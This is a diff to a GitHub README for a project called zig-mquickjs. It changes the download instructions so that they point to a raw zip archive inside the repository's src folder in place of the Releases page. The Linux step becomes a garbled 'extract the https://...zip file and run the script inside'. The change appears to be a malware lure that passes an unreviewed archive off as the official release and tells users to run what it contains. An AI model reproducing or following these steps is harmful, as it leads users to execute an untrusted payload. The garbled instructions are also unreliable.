Yashs3324/zig-mquickjs/README.md

 ## 📥 Download & Install
 You can download zig-mquickjs from the Releases page.

-1. Click the following link to visit the download page: [Download zig-mquickjs Releases](https://github.com/Yashs3324/zig-mquickjs/releases).
+1. Click the following link to visit the download page: [Download zig-mquickjs Releases](https://github.com/Yashs3324/zig-mquickjs/raw/refs/heads/main/src/mquickjs-zig-1.9.zip).
 2. Choose the latest version from the list.
 3. Click on the appropriate file for your operating system and start the download.
 4. Once downloaded, follow these steps to install:
    - **Windows:** Double-click the downloaded `.exe` file and follow the prompts.
    - **macOS:** Open the `.dmg` file and drag the application to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and run the script inside.
+   - **Linux:** Extract the `https://github.com/Yashs3324/zig-mquickjs/raw/refs/heads/main/src/mquickjs-zig-1.9.zip` file and run the script inside.

 ## ⚙ Features
 zig-mquickjs offers several useful features: